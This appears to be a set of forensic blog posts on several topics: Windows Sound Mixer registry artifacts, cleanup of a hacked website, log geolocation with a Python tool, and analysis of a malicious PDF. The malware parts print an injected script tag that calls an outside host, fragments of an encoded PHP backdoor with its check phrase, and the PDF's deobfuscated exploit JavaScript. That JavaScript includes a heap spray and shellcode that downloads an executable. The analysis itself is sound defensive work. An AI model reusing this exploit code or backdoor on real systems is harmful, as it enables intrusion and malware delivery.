Instead, we reference the system list of rendering devices stored at HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render. Each sub-key under this key is a GUID that corresponds to the devices we see noted in the Sound Mixer list. For each GUID there is a sub-key named Properties with a constant value of "{a45c254e-df1c-4efd-8020-67d146a850e0},2" (PKEY_AudioEndPoint_Interface) that contains the device name.



This is a roundabout way of saying: retrieve the value from HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\<GUID>\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0},2 to get the device name. For example:

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{e64c029e-480d-424c-a775-2fd663e1442f}\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0},2 = Speakers

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{bfb5623f-3f3c-4245-803f-d4bae95d0016}\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0},2 = H243H  (A monitor with speakers)

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render\{799503ed-68e3-4293-9905-8a6bc8823094}\Properties{a45c254e-df1c-4efd-8020-67d146a850e0},2 = E320i-A0   (A TV that was previously hooked up)
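On a live system, the GUID-to-name mapping can be enumerated with a few lines of Python. A minimal sketch, using the value name described above (it assumes the _winreg module on Python 2 and read access to HKLM):

import _winreg

RENDER = r"SOFTWARE\Microsoft\Windows\CurrentVersion\MMDevices\Audio\Render"
PKEY_NAME = "{a45c254e-df1c-4efd-8020-67d146a850e0},2"

root = _winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE, RENDER)
i = 0
while True:
    try:
        guid = _winreg.EnumKey(root, i)   # one sub-key per rendering device
    except WindowsError:
        break
    try:
        props = _winreg.OpenKey(root, guid + r"\Properties")
        name, _ = _winreg.QueryValueEx(props, PKEY_NAME)
        print guid, name
    except WindowsError:
        pass                              # device without the expected property
    i += 1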


Again, there are forensic implications that can be determined from this. At one point there was an E320i-A0 TV hooked up. I can grab the modification times from the registry keys to determine an approximate time range for that (new applications stored after the device was installed) and also to determine when the device was removed (new applications stored later that don't reference it). This information can show the portability of the system, such as when a laptop is connected to a docking station.


Referencing Input Devices

Obtaining the input device is performed the same way as retrieving the output device. Instead of a Render device, we'll obtain the Capture device. However, for my test systems, there were two sets of Microphone and Line-In devices, but some of the Sound Mixer applications contained input GUIDs that weren't found in the registry. Further analysis showed that all of these applications were created on the same day, when I had reinstalled Windows on a new system, suggesting that they were related to GUIDs from my old hardware.

These sub-keys contain the same structure as the output devices and can be parsed the same way.


The majority of retrieved applications will have an input GUID of '{00000000-0000-0000-0000-000000000000}' to note that the application did not have any input devices associated with it.

Bringing It All Together

Based on this data, we can extract the application list, obtain the last modified time for each key, and correlate the audio device to get a listing like this:

Date,Time,Output Device,Volume,Input Device,Application
2013-09-04,21:03:32,Speakers,N/A,N/A,\Device\HarddiskVolume2\Program Files (x86)\Fiddler2\Fiddler.exe
2013-09-06,19:54:48,Speakers,N/A,N/A,\Device\HarddiskVolume2\Program Files (x86)\Hopper Disassembler\Hopper.exe
2013-09-18,21:22:27,Speakers,128,N/A,\Device\HarddiskVolume2\Program Files (x86)\Steam\SteamApps\common\Gunpoint\Gunpoint.exe
2013-11-08,11:14:59,Speakers,140,N/A,\Device\HarddiskVolume2\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_11_9_900_117.exe
2013-11-23,23:24:57,Speakers,128,N/A,\Device\HarddiskVolume2\Program Files (x86)\Vuze\Azureus.exe
2013-12-27,20:41:55,Speakers,128,N/A,\Device\HarddiskVolume2\Program Files (x86)\Folder Size\FolderSize.exe
2014-01-21,21:42:24,Speakers,128,N/A,\Device\HarddiskVolume2\Program Files\Oracle\VirtualBox\VirtualBox.exe
2014-01-21,23:34:42,Speakers,N/A,N/A,\Device\HarddiskVolume2\Program Files (x86)\sqlitebrowser_200_b1_win\SQLite Database Browser 2.0 b1.exe
2014-01-25,19:57:25,Speakers,128,N/A,\Device\HarddiskVolume2\Program Files (x86)\Course Vector\minerva\minerva.exe
2014-02-17,02:43:10,Speakers,40,N/A,\Device\HarddiskVolume2\Users\Brian\Desktop\Tor Browser\Browser\firefox.exe
2014-11-10,17:04:02,Speakers,128,N/A,\Device\TrueCryptVolumeP\Tor\App\Firefox\firefox.exe


Returning to the application data, the rest of the information holds minor value for us. The vast majority of applications will also store volume information as a sub-key, although some will not. This volume information is stored in a static GUID sub-key of "{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}" in a value named "3".




The value of "3" (REG_BINARY) contains a large set of binary data, but only one single byte refers to the audio setting, highlighted in yellow below.

04 00 00 00 00 00 00 00 00 00 80 3F 00 00 00 00 00 00 00 00 00 00 00 00

This value ranges from 0-255, with the default 0x80 referring to the median volume of 128. There is additional significance that can be read into this value, especially if a subject chooses to keep certain applications at a very low volume.

Unknowns:


  • There is no apparent correlation between the application sub-key name and any other data in the registry. This key name may be randomly generated.
  • The GUID sub-key under each application is "{219ED5A0-9CBF-4F3A-B927-37C9E5C5F14F}". There is no documentation on this GUID except that it is unique to this family of data.
  • The application registry values of "4" and "5" all contain unknown binary data that were identical in all applications on the test systems. The usage of these keys is unknown.
  • Every system will have at least one application named "#" that will always have an input device. The purpose of this application is unknown.


Scripts for Analysis:


I've written two scripts to acquire this information. One uses the Python _winreg library to acquire the information from the active, live system. The other uses the Python-Registry library to acquire the information from a set of registry files.

Both scripts are located on GitHub for download.  Note that because the application subkeys appear randomly generated, the output from each should be piped to `sort` to see the applications in chronological order.

Example usage:

E:\Development\SoundMixer>SoundMixer_Hive.py -s reg\SOFTWARE -n reg\NTUSER.DAT
2014-05-28,02:31:00,Speakers,N/A,N/A,\Device\HarddiskVolume1\Program Files (x86)\Google\Chrome\Application\chrome.exe
2014-11-07,15:46:18,Speakers,128,N/A,\Device\HarddiskVolume1\Program Files (x86)\VideoLAN\VLC\vlc.exe
2014-05-28,00:10:42,Speakers,N/A,{A9EF3FD9-4240-455E-A4D5-F2B3301887B2},#

Harlan Carvey has also updated his RegRipper application with new plugins based upon this information, so you can immediately test the data in your analysis process.

Analysis of Web-based Malware Attack

By the very nature of being a website on the Internet, this site was always going to be susceptible to an attack eventually. WordPress and blog sites are notoriously targeted with infections that append code to HTML files to point visitors to malicious or advertisement websites. My website was similarly affected last month. Here is how the issue was identified and rectified in just a few minutes after notification.

Notification came by way of Twitter, when a friend let me know that my site was redirecting to somewhere else. I was sitting at my desk and quickly opened it to verify. Sure enough, it was:

Malware infection shown to visitors


I SSH'd into the system and immediately changed the password. I then started looking for the culprit. The main file that was causing the redirection was named 'books.htm' and was in my web root folder. This was a simple HTML page that just lists the book projects I've worked on.

The first thing I did was manually view the file to see the impact. There was an added line of code to the very beginning of the file:


<script src="http://globalpoweringgathering.com/nl.php?p=1"></script>\n
With the infection spotted, I checked the file's MAC times to see when the attack occurred:



$ stat books.htm
File: `books.htm'
Size:1500 Blocks:8 IO Block:4096 regular file
Device:811h/2065d Inode:275324414 Links:1
Access: (0664/-rw-rw-r--) Uid: (10369090/ bbaskin) Gid: (45673/pg144238)
Access: 2010-07-19 07:10:46.000000000 -0700
Modify: 2011-04-02 23:35:38.000000000 -0700
Change: 2011-04-02 23:35:38.000000000 -0700

The results show that the file was modified and changed on April 2nd at 11:35 PM. This is just one file, so we need to compare against another file to verify the date and time. A quick spot check showed an additional HTM file with the infection:



$ stat faq.htm
File: `faq.htm'
Size:143 Blocks:8 IO Block: 4096 regular file
Device:811h/2065d Inode:275322846 Links:1
Access: (0644/-rw-r--r--) Uid: (10369090/ bbaskin) Gid: (45673/pg144238)
Access: 2010-02-25 20:37:47.000000000 -0800
Modify: 2011-04-02 23:35:38.000000000 -0700
Change: 2011-04-02 23:35:38.000000000 -0700

A spot check across other folders showed similar infections. A grep for "globalpower" showed that it only infected .htm and .html files. I then ran the following script to search for the infection code and remove it.


grep -Rl "globalpower" * | xargs sed -i 's|<script src="http://globalpoweringgathering.com/nl.php?p=1"></script>\\n||g'

In short: grep finds the infected files and passes the filenames to sed. Sed then does a global find & replace (s/old/new/g). Since the search query contains a '/', I used '|' as the sed delimiter instead. This looks for the injected code and replaces it with nothing, thus removing it.

Now that we have a known date and time, and assuming that this is not a stomped date, we can focus on the network logs to see what occurred during that time. When reviewing the Apache logs I found the following two lines that were the sole activity during that time.


66.96.128.62 - - [02/Apr/2011:23:35:32 -0700] "POST /main.1.5.back/tmp/aarika_friend.php HTTP/1.1" 200 162 "-""-"
66.96.128.62 - - [02/Apr/2011:23:35:37 -0700] "POST /main.1.5.back/tmp/aarika_friend.php HTTP/1.1" 200 433 "-""-"

These lines show the offending IP address and verify the date and time but, more importantly, they reveal the initial malware script that caused the problems. They also show two consecutive connections, five seconds apart. The first connection sent 162 bytes of data back to the attacker and the second sent 433 bytes. The file still existed on the system. I gathered the file inode data below, then renamed the file and chmod'd it to 400 (r--------) to avoid any additional execution. At this point the date sunk in. February 24th? The timestamps could be stomped, or the file really could have been uploaded back then. My access logs do not go that far back, so I have to assume the worst.

$ stat aarika_friend.php
File: `aarika_friend.php'
Size: 28278 Blocks: 56 IO Block: 4096 regular file
Device: 811h/2065d Inode: 113164428 Links: 1
Access: (0644/-rw-r--r--) Uid: (10369090/ bbaskin) Gid: (45673/pg144238)
Access: 2011-02-24 00:31:36.000000000 -0800
Modify: 2011-02-24 00:31:36.000000000 -0800
Change: 2011-02-24 00:31:36.000000000 -0800
This PHP file was encoded into an unreadable format that we'll touch on later. For now, the hole needs to be patched. The first big issue is that the file lives within a folder called "/main.1.5.back/tmp". When I was doing some obscure testing over a year ago I set the tmp folder in my Joomla install to 777 permissions and then neglected to set them back. Worst. Mistake. Ever. When I performed a major Joomla update on December 31, 2010, I copied the entire directory to a backup and created a new one. This wide-open directory sat there for months. How did the file end up in that particular location? I don't know at this point. I changed permissions on the folder for now and checked all other folders to ensure that none were left open.
To see if any other files were accessed, I scanned my folder tree for any file modified or changed within the last 90 days by running:

$ find ./ -mtime -90
$ find ./ -ctime -90

This search did not uncover any additional files.

It was an embarrassing hit, but I did eventually clean the system up. From point of notification to remediation was about 10 minutes. And at least I hold no PII on the server ;)

Malware analysis

For the time being, I kept a copy of the infected files, moved outside of the public web folder to a place where I could analyze them later. I focused on aarika_friend.php and copied the code to a VM environment running Linux. The file included the following data (some portions reduced for obvious reasons):


<?php$_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f\x6e";$_8bb1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";$_8b7b1f56=$_8b7b("",$_8bb1f("JGs9MTQzOyRtPWV4cGxvZGUoIjsiLCIyMzQ7MjUzOzI1MzsyMjQ7
...
CgkbSBhcyAkdilpZiAoJHYhPSIiKSR6Lj1jaHIoJHZeJGspO2V2YWwoJHopOw=="));$_8b7b1f56();?>

Looking at the low-ASCII structure of the data, and the trailing "==", it's easy to see this is Base64 encoded. I removed the header up to the "JGs9..." and the tail after the "==" and ran it through a Base64 decoder. It resulted in the following data (again, some portions removed):

$k=143;$m=explode(";","234;253;253;224;253;208;253;234;255;
...
175;175;175;242;130;133;242;175;");$z="";foreach($m as $v)if($v!="")$z.=chr($v^$k);eval($z);
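As an aside, the carve-and-decode step scripts easily. A minimal sketch, assuming the Base64 blob sits in double quotes within the captured file as shown above (the file name is just illustrative):

import base64
import re

# Pull the quoted Base64 blob (it starts with 'JGs9') out of the obfuscated
# PHP and decode it to recover the second layer.
raw = open('aarika_friend.php').read()
blob = re.search(r'"(JGs9[A-Za-z0-9+/=]+)"', raw).group(1)
print(base64.b64decode(blob))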
The explode() and chr() PHP functions here are the key. Notice the first variable, $k=143. explode() splits the long string on each semicolon into an array of 3-digit numbers; the loop then XORs (^) each number with 143 and converts the result to an ASCII character with chr(number^143). We can test this manually:

$ php -r 'echo(chr(234^143).chr(253^143).chr(253^143).chr(224^143).chr(253^143)."\n");'

error
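The same decode works outside of PHP as well. A minimal Python sketch, using just the first few numbers from the array (which spell out the same "error" seen above):

# XOR each 3-digit number with the key and join the resulting characters.
key = 143
numbers = '234;253;253;224;253'
print(''.join(chr(int(n) ^ key) for n in numbers.split(';') if n))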


Now we know that we're seeing appropriate ASCII text, which includes the word 'error'. The foreach() command goes through each 3-digit number, converts it to an ASCII character, and appends it to a master variable string called $z. At this point I'm going to edit the code to remove the very last command: eval($z);
Instead, I'll replace it with:

$bb=fopen('malware.txt','w');fwrite($bb,$z);fclose($bb);

I then add the necessary PHP header and footer to the file: "<?php " and "?>". After making the edits I double check, then triple check, to ensure that I removed the eval() statement. Then I run:


php -f aarika_friend.decoded.php
It creates a new output called 'malware.txt' which contains the raw code. Rather than display it here, I'll point you to a pastebin archive of the code.  Pastebin gives a safe environment to view the code while performing syntax highlighting to make it easier to read.
So let's analyze a bit of what's going on in this code. By looking solely at the HTML sections we can see a basic web structure in place. The script creates two text boxes, Check (p) and cmd. The attacker types their command into the cmd box and a verification phrase into the Check box.
Before executing the command the code first looks to see if the check phrase, stored as a variable named 'p', is correct.

if(md5($_COOKIE["p"])!="ca3f717a5e53f4ce47b9062cfbfb2458"){

If the MD5 hash of the phrase matches the value above then the specified command executes. The verification value that matches that MD5? It's "showmustgoon!"


 $ echo -n showmustgoon! | md5sum
ca3f717a5e53f4ce47b9062cfbfb2458 -
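The same check can be done in Python (a minimal sketch; the phrase is the one identified above):

import hashlib

# Compare a candidate pass-phrase against the hash hard-coded in the backdoor.
target = 'ca3f717a5e53f4ce47b9062cfbfb2458'
phrase = 'showmustgoon!'
print(hashlib.md5(phrase.encode()).hexdigest() == target)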

At this point, the rest is just an academic exercise. The exploit was found, the vulnerability was found, and all was remediated. It turned into a learning lesson for me and hopefully for you as well.




Geolocational Log Analysis: Think Globally, Act Locally


In many network environments the administrators and security engineers have an understanding of the full geographical scope and reach of their network. While some corporations have a global audience and expect traffic from the far reaches of the world, others are more localized and target a specific small region.

A health care provider in Alaska would monitor its network connections to ensure that they are limited to its main source of users, i.e. those in Alaska. An insurance company in St. Louis will see mostly traffic from IP addresses in Missouri, as well as Illinois, since the city sits on the state line.

Occasionally, administrators may notice connections being made from Hawaii, Bermuda, or Italy, signifying users who are on vacation but are still wired in to their work. However, a long-term series of connections from an Eircom subscriber (Ireland's largest ISP) should spark the interest of the network administrator of a Seattle tax firm.

While anonymous web connections from global addresses are common, specific attention should be paid to such addresses being used to access password-protected areas of a corporation. This could include remote file access, VPN and web-based corporate email.

In such cases the logs from these applications, usually supplied in plain text or W3C format, contain details about each transaction, including the remote IP address and the account name being authorized. In reviewing logs from various incident responses, cmdLabs has found that a short daily log review could help smaller corporations quickly determine whether a user account was compromised and accessed from a remote location.

For example, the log sample below from a Cisco ASA tracks VPN connections. The account "cmdLabs\bbaskin" was accessed from the IP address 159.134.100.100 on 2 April 2011, an IP that traces back to Ireland. A few hours later the same account was accessed from an IP address in Austria.



Apr  2 21:53:37 192.168.1.1 Apr 02 2011 21: 53:08: %ASA-6-302013: Built outbound TCP connection 7823 for inside:10.10.10.50/389 (10.10.10.50/389) to NP Identity Ifc:192.168.1.1/1047 (192.168.1.1/1047)
Apr 2 21:53:37 192.168.1.1 Apr 02 2011 21: 53:08: %ASA-6-104: AAA user authentication Successful : server = 10.10.10.50 : user = cmdLabs\bbaskin
Apr 2 21:53:37 192.168.1.1 Apr 02 2011 21: 53:08: %ASA-6-113009: AAA retrieved default group policy (DfltGrpPolicy) for user = cmdLabs\bbaskin
Apr 2 21:53:37 192.168.1.1 Apr 02 2011 21: 53:08: %ASA-6-113008: AAA transaction status ACCEPT : user = cmdLabs\bbaskin
Apr 2 21:53:37 192.168.1.1 Apr 02 2011 21: 53:08: %ASA-6-734001: DAP: User cmdLabs\bbaskin, Addr 159.134.100.100, Connection Clientless: The following DAP records were selected for this connection: DfltAccessPolicy


For this small set of data it is trivial to query each IP address to determine its country of origin, netblock owner, and other details that would highlight unauthorized access. The problem arises when you have hundreds of thousands of such transactions in your daily log files.




One service that cmdLabs uses regularly is the IP to ASN WHOIS server run by Team Cymru. This server provides quick and easy access to country codes for a given IP address. However, it has two limitations: it requires Internet access, which is not readily available from a forensic workstation, and processing a large bulk of IPs requires their netcat interface, which only returns ASNs and not country codes. To overcome these limitations I've developed a simple solution that can process hundreds of thousands of IP addresses to determine country codes.

This solution is a small Python script called IP2CC that takes an IP address as input and outputs the originating country code for that IP. This solution requires three components:
  1. The free country code database located at http://www.maxmind.com/app/geolitecountry (updated monthly)
  2. Python API module to access this database located at https://github.com/appliedsec/pygeoip
  3. The ip2cc.py script. Downloadable at the end of this blog post.
The script allows for input to be given via the command line, stdin, or an input file. In normal use it will simply output the country code. With the -c or -t option the output will contain both the IP and country code in either comma-separated (CSV) or tab-separated (TSV) form, respectively.


python ip2cc.py [-i <IP address> | -f <input file>] [-c] [-t]

> python ip2cc.py -i 11.11.11.11
US
> python ip2cc.py -i 22.22.22.22 -c
22.22.22.22,US
> echo 33.33.33.33 | python ip2cc.py
US
> python ip2cc.py -f IP.txt -c
14.48.7.101,AU
12.51.21.19,US
10.61.14.9,Internal
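Under the hood, the lookup itself is a thin wrapper around pygeoip and the GeoLite Country database. A minimal sketch of the idea (not the actual ip2cc source; it assumes GeoIP.dat sits in the working directory):

import pygeoip

gi = pygeoip.GeoIP('GeoIP.dat')

def lookup(ip):
    # Treat private address space as internal rather than querying the database.
    if ip.startswith(('10.', '192.168.')):
        return 'Internal'
    return gi.country_code_by_addr(ip) or 'Unknown'

print(lookup('11.11.11.11'))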

In one use, we'll eliminate known intranet/extranet IP addresses and run the resulting list through IP2CC to produce a master list of foreign accesses. This script will run in Linux and OSX in conjunction with the native OS command line tools. For a Windows environment you will find additional capabilities by installing the necessary GnuWin32 components. For example, when reviewing a NCSA-formatted log with the IP address in the first field:

D:\> type in051611.log | egrep -v "^192" | gawk "{print $1}" | python ip2cc.py -t | egrep -v "US|Internal" | gawk -F\t "{print $1}" | sort | uniq > DailyForeignIPs.txt

D:\> for /F %i in (DailyForeignIPs.txt) do grep "%i" in051611.log >> DailyForeignConnections.txt

The first command above will save a simple text listing of all unique foreign IP addresses into a file for processing. The second line takes each IP address from that resulting file and compares it back against the logs to extract all lines that include its presence. The resulting DailyForeignConnections.txt can then be quickly reviewed to determine if any accounts were accessed from a foreign IP address.

Dealing with the VPN logs shown earlier, we'll change our command line a bit. Using the standard Cisco log file index as a source we can see that the log id of 734001 will show us the remote IP address of a user login. We'll search the log for that id and then parse out the IP address in the 15th field. An additional hindrance is that the IP address is appended with a comma, which we’ll remove with the ‘tr’ command.

D:\> type asavpn-051611.log | findstr "734001" | gawk "$15 !~ /^192/ {print $15}" | tr -d "," | python ip2cc.py -t | egrep -v "US|Internal" | sort | uniq > DailyVPNForeignIPs.txt
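For readers who would rather stay in Python than stack command line tools, the same extraction can be sketched out as below (the field position assumes the log layout shown earlier; the file name is the same sample log):

# Pull the remote address (field 15, with its trailing comma) from every
# 734001 record and print the unique, non-internal addresses for ip2cc.
seen = set()
for line in open('asavpn-051611.log'):
    if '%ASA-6-734001' not in line:
        continue
    fields = line.split()
    if len(fields) < 15:
        continue
    ip = fields[14].rstrip(',')
    if not ip.startswith('192.'):
        seen.add(ip)

for ip in sorted(seen):
    print(ip)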

This is ultimately just a very simple Python script. In-house, we use it as a mere function within larger processes, but its simplicity allows it to be used in a variety of result-tuning workflows. Customization is easy. At times I'll make an offshoot of the script to process input from the `uniq` command with the `-c` count option. The `uniq -c` option adds a new column that specifies the total number of instances of each IP address, which is useful when evaluating the persistence of a single IP amongst thousands. A few small changes to the Python will allow you to read this count and add it to the CSV output for easy integration into a spreadsheet.

Usage of a tool like IP2CC is a first step in opening an administrator's eyes to traffic beyond their network. A good administrator or security engineer should monitor not only the traffic that flows across their network but also the perceived traffic that flows from a network's outer nodes to the Internet. Monitoring for your company's presence in spam blacklists, a malware rating on services like Web of Trust, and other indicators can give clues that an infection or intrusion may be underway within your network.

Downloads:
IP2CC Python Source Code v1.0

Malicious PDF Analysis: Reverse code obfuscation

I normally don't find the time to analyze malware at home, unless it is somehow targeted towards me (like the prior write-up of an infection on this site). This last week I received a very suspicious PDF in an email that made it through GMail's spam filters and grabbed my attention.

The email was received to my Google Mail account and appeared in my inbox. It was easily accessible, but within two days Google did alert on the virus in the attachment and prevented downloading it. The email had one attachment, which could still be obtained as Base64 when viewing the email in its raw form: 92247.pdf.

A quick view in a hex editor showed that the file, only 13,205 bytes in size, included no obvious dropper, decoy, or even displayable PDF data. There was just one object of note, which contained an XML subform with embedded JavaScript. Boring...

Upon examining the JavaScript, I saw a large block of data that would normally contain the shell code, or even further JavaScript, to attack the victimized system. However, this example proved odd. There was a large block of such data (abbreviated below), but it contained only integer numbers between 0 and 74. This is not standard shell code.

    arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@12@11@3@5@5@5@11@9';

So I started looking at the surrounding code:



    8 0 obj <</Length 325325>> stream <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
    <asd/>as<config xmlns='123'><asd/>
    <xdp:present>
    <pdf>
    <xdp:interactive>1</xdp:interactive>
    <int>0</int>
    a
    <asd/>a<version>1.5</version>
    a<asd/>
    </pdf>
    </xdp:present>
    <asd/></config><asd/>
    <template xmlns='http://www.xfa.org/schema/xfa-template/2.5/'>
    <asd/>
    a<subform name="a1"> <pageSet>
    <pageArea id="roteYom" name="roteYom">
    <contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
    <medium long="792pt" short="612pt" stock="default"/>
    </pageArea>
    </pageSet>
    <asd/>a
    <subform name='v236536b346b'>
    a<asd/>a<field name='qwe123b'>a<asd/>a<event activity='initialize'>
    <script contentTyp='application'
    contentType='application/x-javascript'>
    x='e';
    arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@12@11@3@5@5@5@11@9';
    cc={q:"var pding;b,cefhots_x=wAy()l1\"420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"}.q;

    q=x+'v'+'al';
    a=(Date+String).substr(2,3);
    aa=([].unshift+[].reverse).substr(2,3);
    if (aa==a){
    t='3vtwe';
    e=t['substr'];
    w=e(12)[q];
    s=[];
    ar=arr.split('@');
    n=cc;
    for(i=0;i<ar.length;i++){
    s[i]=n[ar[i]];
    }
    if(a===aa)w(s.join(''));
    }
    </script>a
    </event><ui>
    <imageEdit/>
    </ui>
    </field>
    </subform>
    </subform><Gsdg/>a</template>a<asd/>a<xfa:datasets a='a' xmlns:xfa='http://www.xfa.org/schema/xfa-data/1.1' b='b'>
    <xfa:data><a1 test="123">
    </a1>
    </xfa:data>
    </xfa:datasets>
    </xdp:xdp>
    endstream
    endobj
The first few things that popped out were obfuscated, HTML-escaped variable names. In the raw stream you won't see "w" or "n" written directly; instead, the variable names appear as the HTML entities "&#000119;" and "&#000110;", the ASCII decimal values for "w" and "n" respectively. Likewise, operators such as "<" are escaped as "&lt;". The big thing we look for is the "eval()" statement, and it is equally obfuscated as: x='e'; q=x+'v'+'al';, making q = "eval".

But what about that large block of data? And what is up with that unusual "cc" variable that contains a long list of characters? By analyzing the decoding "for" loop, you can see the meaning. The "cc" is actually the custom character set of the end result, and the large data block "arr" is a series of numbers that each reference an individual character, separated by a "@".

With this configuration, you can visually analyze the first few pointers:
0@1@2@3@4@1@5@5@6@7@8@9 equals "var padding;". Bingo. But even with this layer of obfuscation, a quick Python script makes short work of it:
    arr='0@1@2@3@4@1@5@5@6@7@8@9@0@1@2@3@10@10@10@11@3@12@12@11@3@5@5@28@30@28@28@9'
    cc="var pding;b,cefhots_x=wAy()l1\"420657839u{.VS'<+I}*/DkR%-W[]mCj^?:LBKQYEUqFM"
    result=""
    for i in arr.split("@"):result += cc[int(i)]
    print result
When run, voila! Our de-obfuscated code:
    var padding;var bbb, ccc, ddd, eee, fff, ggg, hhh;var pointers_a, i;var x = new
    Array();var y = new Array();var _l1="4c20600f0517804a3c20600f0f63804aa3eb804a302
    0824a6e2f804a41414141260000000000000000000000000000001239804a6420600f00040000414
    14141414141416683e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0
    374332c81ee1510ffffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f
    5568b762003f533c94941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e240
    3dd668b0c4b8d46ecff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf
    38b68088bf76a0559e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1
    083c305ffe3686f6e00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5
    c240cc7042472656773c744240476723332c7442408202d73205368f8000000ff560c8be833c951c
    7441d0077706274c7441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00f
    f561485c075166a0053ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c
    46a006afeff5608e89cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f706874747
    03a2f2f757262616e2d676561722e636f6d2f3430345f706167655f696d616765732f303230362e6
    578650000";var _l2="4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a4141
    4141260000000000000000000000000000007188804a6420600f0004000041414141414141416683
    e4fcfc85e47534e95f33c0648b40308b400c8b701c568b760833db668b5e3c0374332c81ee1510ff
    ffb88b4030c346390675fb87342485e47551e9eb4c51568b753c8b74357803f5568b762003f533c9
    4941fcad03c533db0fbe1038f27408c1cb0d03da40ebf13b1f75e65e8b5e2403dd668b0c4b8d46ec
    ff54240c8bd803dd8b048b03c5ab5e59c3eb53ad8b6820807d0c33740396ebf38b68088bf76a0559
    e898ffffffe2f9e80000000058506a4068ff0000005083c01950558bec8b5e1083c305ffe3686f6e
    00006875726c6d54ff1683c4088be8e861ffffffeb02eb7281ec040100008d5c240cc70424726567
    73c744240476723332c7442408202d73205368f8000000ff560c8be833c951c7441d0077706274c7
    441d052e646c6cc6441d0900598ac1043088441d0441516a006a0053576a00ff561485c075166a00
    53ff56046a0083eb0c53ff560483c30ceb02eb1347803f0075fa47803f0075c46a006afeff5608e8
    9cfeffff8e4e0eec98fe8a0e896f01bd33ca8a5b1bc64679361a2f70687474703a2f2f757262616e
    2d676561722e636f6d2f3430345f706167655f696d616765732f303230362e6578650000";_l3=ap
    p;_l4=new Array();function _l5(){var _l6=_l3.viewerVersion.toString();_l6=_l6.re
    place('.','');while(_l6.length<4)_l6+='0';return parseInt(_l6,10)}function _l7(_
    l8,_l9){while(_l8.length*2<_l9)_l8+=_l8;return _l8.substring(0,_l9/2)}function _
    I0(_I1){_I1=unescape(_I1);roteDak=_I1.length*2;dakRote=unescape('%u9090');spray=
    _l7(dakRote,0x2000-roteDak);loxWhee=_I1+spray;loxWhee=_l7(loxWhee,524098);for(i=
    0; i < 400; i++)_l4[i]=loxWhee.substr(0,loxWhee.length-1)+dakRote;}function _I2(
    _I1,len){while(_I1.length<len)_I1+=_I1;return _I1.substring(0,len)}function _I3(
    _I1){ret='';for(i=0;i<_I1.length;i+=2){b=_I1.substr(i,2);c=parseInt(b,16);ret+=S
    tring.fromCharCode(c);}return ret}function _ji1(_I1,_I4){_I5='';for(_I6=0;_I6<_I
    1.length;_I6++){_l9=_I4.length;_I7=_I1.charCodeAt(_I6);_I8=_I4.charCodeAt(_I6%_l
    9);_I5+=String.fromCharCode(_I7^_I8);}return _I5}function _I9(_I6){_j0=_I6.toStr
    ing(16);_j1=_j0.length;_I5=(_j1%2)?'0'+_j0:_j0;return _I5}function _j2(_I1){_I5=
    '';for(_I6=0;_I6<_I1.length;_I6+=2){_I5+='%u';_I5+=_I9(_I1.charCodeAt(_I6+1));_I
    5+=_I9(_I1.charCodeAt(_I6))}return _I5}function _j3(){_j4=_l5();if(_j4<9000){_j5
    ='o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';_j6=_l1;_j7=
    _I3(_j6)}else{_j5='kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE
    4BK';_j6=_l2;_j7=_I3(_j6)}_j8='SUkqADggAABB';_j9=_I2('QUFB',10984);_ll0='QQcAAAE
    DAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwE
    EAAEAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';_ll1=_j8+_j9+_ll0+_j5;_ll2=_ji1(_
    j7,'');if(_ll2.length%2)_ll2+=unescape('');_ll3=_j2(_ll2);with({k:_ll3})_I0(k
    );qwe123b.rawValue=_ll1}_j3();
With this type of output, I would typically use Malzilla to clean it up for exploit analysis. But, with the shell code in plain sight, I'll go right for the payload. There are actually two copies of the shell code, stored as "_l1" and "_l2", with a few slight differences between the two. The code is binary data stored as plaintext hex, where every two characters represent the hexadecimal value of one binary byte. Copying and pasting the data into a hex editor can convert it to binary.
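The conversion can also be scripted in a couple of lines (a minimal sketch; the file names are illustrative placeholders for the copied _l1 hex text and the binary output):

import binascii

# Convert the plaintext hex shellcode into a raw binary file for a hex
# editor, IDA Pro, or Shellcode2Exe.py.
hexdata = open('shellcode_l1.txt').read().strip()
open('shellcode_l1.bin', 'wb').write(binascii.unhexlify(hexdata))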

